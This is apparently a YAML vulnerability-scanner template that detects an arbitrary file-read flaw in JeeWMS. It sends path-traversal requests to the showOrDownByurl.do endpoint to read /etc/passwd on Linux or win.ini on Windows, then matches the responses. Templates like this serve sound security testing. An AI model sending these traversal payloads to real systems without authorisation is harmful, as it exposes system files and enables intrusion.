id: jeewms-showordownbyurl-fileread

info:
    name: Jeewms Showordownbyurl fileread
    author: B1anda0(https://github.com/B1anda0)
    severity: high

rules:
    linux0:
        request:
            method: GET
            path: /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd
        expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
    windows0:
        request:
            method: GET
            path: /systemController/showOrDownByurl.do?down=&dbPath=../../../../../Windows/win.ini
        expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
expression: linux0() || windows0()

